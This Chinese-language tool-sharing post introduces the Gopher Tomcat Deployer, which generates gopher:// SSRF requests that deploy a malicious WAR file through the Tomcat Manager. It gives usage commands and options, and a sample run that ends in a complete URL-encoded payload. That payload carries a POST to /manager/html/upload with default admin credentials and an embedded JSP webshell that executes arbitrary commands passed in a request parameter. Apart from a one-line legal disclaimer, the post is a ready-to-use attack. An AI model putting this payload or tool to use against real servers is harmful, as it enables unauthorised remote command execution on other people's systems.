Gopher Tomcat 部署工具

项目地址

https://github.com/pimps/gopher-tomcat-deployer

小编记录

Gopher Tomcat Deployer是一个用于部署恶意Web应用程序的工具，可以生成GOPHER请求，将恶意应用程序部署到Tomcat服务器的Manager应用程序中。这样，攻击者就可以通过该应用程序访问和控制Tomcat服务器，从而实施各种攻击。使用该工具需要掌握一定的Web安全知识和技能，并遵守相关法律法规。请勿将其用于非法用途。

 

 

用法

1. 首先安装Python环境。

2. 下载Gopher Tomcat Deployer工具，保存在本地。

3. 在终端中进入到Gopher Tomcat Deployer工具所在的目录。

4. 运行以下命令以查看帮助信息：

   $ python gopher-tomcat-deployer.py -h

5. 运行以下命令以生成恶意应用程序的GOPHER请求，以部署在Tomcat Manager中：

   $ python gopher-tomcat-deployer.py webshell

   其中，webshell是要部署的Web后门的路径，可以是任何有效的.jsp文件。

6. 还可以使用以下可选参数进行设置：

   -h, --help                        显示帮助信息并退出
   -o OUTPUT, --output OUTPUT        输出文件名（默认为cmd.war）
   -u USER, --user USER              Tomcat用户（默认为admin）
   -p PASSWORD, --password PASSWORD  Tomcat密码（默认为admin）
   -t TARGET, --target TARGET        目标Tomcat IP地址（默认为127.0.0.1）
   -pt PORT, --port PORT             目标Tomcat端口（默认为8080）

7. 比如，运行以下命令以指定不同的Tomcat用户和密码：

   $ python gopher-tomcat-deployer.py webshell -u myuser -p mypassword

 

示例

$ python gopher-tomcat-deployer.py -u admin -p admin -t 127.0.0.1 -pt 8080 cmd.jsp

=============================================================================
|                        GOPHER TOMCAT DEPLOYER v0.1                        |
|                              by pimps and alec                            |
=============================================================================

Original file length: 00000360
Original file crc32: f724925e
The input file CRC32 or file length contained an invalid byte.
Length adjustment completed. 2 whitespace ' ' chars were added to the webshell input.
New file length: 00000362
New file crc32: d50a6303
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[-] Invalid checksum/offset found in zip file. Adding white space and trying again...
Original file length: 00000363
Original file crc32: 70b0949c
The input file CRC32 or file length contained an invalid byte.
Length adjustment completed. 2 whitespace ' ' chars were added to the webshell input.
New file length: 00000365
New file crc32: c5a5f46e
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[-] Invalid checksum/offset found in zip file. Adding white space and trying again...
Original file length: 00000366
Original file crc32: 43a326ee
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[-] Invalid checksum/offset found in zip file. Adding white space and trying again...
Original file length: 00000367
Original file crc32: ae9da31c
The input file CRC32 or file length contained an invalid byte.
Length adjustment completed. 1 whitespace ' ' chars were added to the webshell input.
New file length: 00000368
New file crc32: fdc30ea9
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[-] Invalid checksum/offset found in zip file. Adding white space and trying again...

[ SNIP FOR BREVITY ]

Original file length: 000003FA
Original file crc32: 83d9dad0
The input file CRC32 or file length contained an invalid byte.
Length adjustment completed. 1 whitespace ' ' chars were added to the webshell input.
New file length: 000003FB
New file crc32: 6f3cc44b
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[-] Invalid checksum/offset found in zip file. Adding white space and trying again...
Original file length: 000003FC
Original file crc32: 80d6b99
The input file CRC32 or file length contained an invalid byte.
Length adjustment completed. 4 whitespace ' ' chars were added to the webshell input.
New file length: 00000400
New file crc32: 286e4e38
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[+] Valid WAR file generated... Creating the gopher payload now...
[+] Payload generated with success:
------------------------------------------------------------------------
gopher://127.0.0.1:8080/_%50%4f%53%54%20%2f%6d%61%6e%61%67%65%72%2f%68%74%6d%6c%2f%75%70%6c%6f%61%64%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%32%37%2e%30%2e%30%2e%31%3a%38%30%38%30%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%6d%75%6c%74%69%70%61%72%74%2f%66%6f%72%6d%2d%64%61%74%61%3b%20%62%6f%75%6e%64%61%72%79%3d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%31%35%31%30%33%32%31%34%32%39%37%31%35%35%34%39%36%36%33%33%33%34%37%36%32%38%34%31%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%33%37%30%0d%0a%41%75%74%68%6f%72%69%7a%61%74%69%6f%6e%3a%20%42%61%73%69%63%20%59%57%52%74%61%57%34%36%59%57%52%74%61%57%34%3d%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%55%70%67%72%61%64%65%2d%49%6e%73%65%63%75%72%65%2d%52%65%71%75%65%73%74%73%3a%20%31%0d%0a%0d%0a%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%31%35%31%30%33%32%31%34%32%39%37%31%35%35%34%39%36%36%33%33%33%34%37%36%32%38%34%31%0d%0a%43%6f%6e%74%65%6e%74%2d%44%69%73%70%6f%73%69%74%69%6f%6e%3a%20%66%6f%72%6d%2d%64%61%74%61%3b%20%6e%61%6d%65%3d%22%64%65%70%6c%6f%79%57%61%72%22%3b%20%66%69%6c%65%6e%61%6d%65%3d%22%63%6d%64%2e%77%61%72%22%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%6f%63%74%65%74%2d%73%74%72%65%61%6d%0d%0a%0d%0a%50%4b%03%04%14%00%00%00%00%00%00%00%21%00%38%4e%6e%28%00%04%00%00%00%04%00%00%07%00%00%00%63%6d%64%2e%6a%73%70%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%0d%0a%3c%25%0d%0a%2f%2f%0d%0a%2f%2f%20%4a%53%50%5f%4b%49%54%0d%0a%2f%2f%0d%0a%2f%2f%20%63%6d%64%2e%6a%73%70%20%3d%20%43%6f%6d%6d%61%6e%64%20%45%78%65%63%75%74%69%6f%6e%20%28%75%6e%69%78%29%0d%0a%2f%2f%0d%0a%2f%2f%20%62%79%3a%20%55%6e%6b%6e%6f%77%6e%0d%0a%2f%2f%20%6d%6f%64%69%66%69%65%64%3a%20%32%37%2f%30%36%2f%32%30%30%33%0d%0a%2f%2f%0d%0a%25%3e%0d%0a%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%0d%0a%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%6d%79%66%6f%72%6d%22%20%41%43%54%49%4f%4e%3d%22%22%3e%0d%0a%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6d%64%22%3e%0d%0a%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%0d%0a%3c%2f%46%4f%52%4d%3e%0d%0a%3c%70%72%65%3e%0d%0a%3c%25%0d%0a%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%0d%0a%20%20%20%20%20%20%20%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%0d%0a%20%20%20%20%20%20%20%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%29%3b%0d%0a%20%20%20%20%20%20%20%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%0d%0a%20%20%20%20%20%20%20%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%0d%0a%20%20%20%20%20%20%20%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%0d%0a%20%20%20%20%20%20%20%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%0d%0a%20%20%20%20%20%20%20%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7d%0d%0a%20%20%20%20%20%20%20%20%7d%0d%0a%25%3e%0d%0a%3c%2f%70%72%65%3e%0d%0a%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e%0d%0a%0d%0a%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%50%4b%01%02%14%03%14%00%00%00%00%00%00%00%21%00%38%4e%6e%28%00%04%00%00%00%04%00%00%07%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%63%6d%64%2e%6a%73%70%50%4b%05%06%00%00%00%00%01%00%01%00%35%00%00%00%25%04%00%00%00%00%0d%0a%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%31%35%31%30%33%32%31%34%32%39%37%31%35%35%34%39%36%36%33%33%33%34%37%36%32%38%34%31%2d%2d%0d%0a
------------------------------------------------------------------------
HACK THE PLANET!!1!11!

 

标签：工具分享, 扫描工具, EXP脚本